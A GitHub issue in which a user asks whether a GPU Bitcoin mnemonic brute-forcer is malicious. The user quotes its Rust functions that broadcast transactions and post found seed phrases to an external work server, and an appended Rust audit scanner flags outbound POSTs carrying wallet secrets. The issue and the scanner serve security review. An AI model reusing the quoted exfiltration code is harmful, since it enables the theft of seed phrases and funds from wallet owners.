Is this code potentially malicious? Could it drain a Bitcoin account if a valid mnemonic is found? #15

Open
alamiali12 opened this issue Oct 22, 2024 · 0 comments


I found a piece of code on GitHub that leverages GPU using OpenCL to brute-force Bitcoin mnemonics. However, I'm concerned about its safety. Specifically, I noticed that the code includes sections that broadcast transactions and send recovery phrases (mnemonics) to an external server. Here are the parts I'm worried about:

  1. Transaction broadcasting:

    fn broadcast_tx(rawtx: String) {
      let mut json_body = HashMap::new();
      json_body.insert("tx", rawtx);
      let client = reqwest::blocking::Client::new();
      let _res = client.post("https://api.blockcypher.com/v1/btc/main/txs/push").json(&json_body).send();
    }

  2. Sending recovery phrases to an external server:

    fn log_solution(offset: u128, mnemonic: String) {
      let mut json_body = HashMap::new();
      json_body.insert("mnemonic", mnemonic);
      json_body.insert("offset", offset.to_string());
      json_body.insert("secret", WORK_SERVER_SECRET.to_string());
      let client = reqwest::blocking::Client::new();
      let _res = client.post(&format!("{}/mnemonic", WORK_SERVER_URL.to_string()).to_string()).json(&json_body).send();
    }

My questions are:

  • Could this code drain a Bitcoin account if a valid mnemonic is found, especially with the broadcast_tx function?
  • Why does the code send the recovery phrase (mnemonic) to an external server? Can this lead to compromising the security of the wallet?
  • Is there a legitimate purpose for these external calls, or should they be removed to prevent potential security risks?

I'd appreciate your clarification on whether this code is safe to use as-is or if it requires modifications to avoid malicious behavior.
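One way to audit the behaviour the question asks about, as an added example that is not part of the original issue or of the project's code: a text scan that reports, for each function, the POST destination and the JSON fields it sends. The names `Egress`, `find_egress` and `sends_wallet_secret` are hypothetical, and the scan assumes one `.post(..).json(..)` chain per function.

```rust
// Added audit example, not code from the repository under discussion.
// Lists each function that makes an HTTP POST and the JSON keys it sends.

// The two functions quoted in the issue, used as the input to scan.
const SAMPLE: &str = r#"
fn broadcast_tx(rawtx: String) {
  let mut json_body = HashMap::new();
  json_body.insert("tx", rawtx);
  let client = reqwest::blocking::Client::new();
  let _res = client.post("https://api.blockcypher.com/v1/btc/main/txs/push").json(&json_body).send();
}
fn log_solution(offset: u128, mnemonic: String) {
  let mut json_body = HashMap::new();
  json_body.insert("mnemonic", mnemonic);
  json_body.insert("offset", offset.to_string());
  json_body.insert("secret", WORK_SERVER_SECRET.to_string());
  let client = reqwest::blocking::Client::new();
  let _res = client.post(&format!("{}/mnemonic", WORK_SERVER_URL.to_string()).to_string()).json(&json_body).send();
}
"#;

struct Egress { func: String, target: String, keys: Vec<String> }

// Naive text scan (assumption: one `.post(..).json(..)` chain per function).
fn find_egress(src: &str) -> Vec<Egress> {
    let mut found = Vec::new();
    for chunk in src.split("fn ").skip(1) {
        // Text between `.post(` and `).json(` is the destination expression.
        let rest = match chunk.find(".post(") { Some(i) => &chunk[i + 6..], None => continue };
        let end = match rest.find(").json(") { Some(i) => i, None => continue };
        // Every `.insert("key", ..)` in the body names a field that leaves the host.
        let keys = chunk.split(".insert(\"").skip(1)
            .filter_map(|p| p.split('"').next()).map(String::from).collect();
        let func = chunk.split('(').next().unwrap_or("").trim().to_string();
        found.push(Egress { func, target: rest[..end].to_string(), keys });
    }
    found
}

// True when a posted field name suggests wallet key material.
fn sends_wallet_secret(e: &Egress) -> bool {
    e.keys.iter().any(|k| ["mnemonic", "seed", "privkey"].iter().any(|s| k.contains(*s)))
}

fn main() {
    for e in find_egress(SAMPLE) {
        println!("{} -> {} keys={:?} wallet_secret={}", e.func, e.target, e.keys, sends_wallet_secret(&e));
    }
}
```

Run over a whole source tree, the same scan gives a reviewer a list of every outbound POST to inspect before the binary is run with real wallet data.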
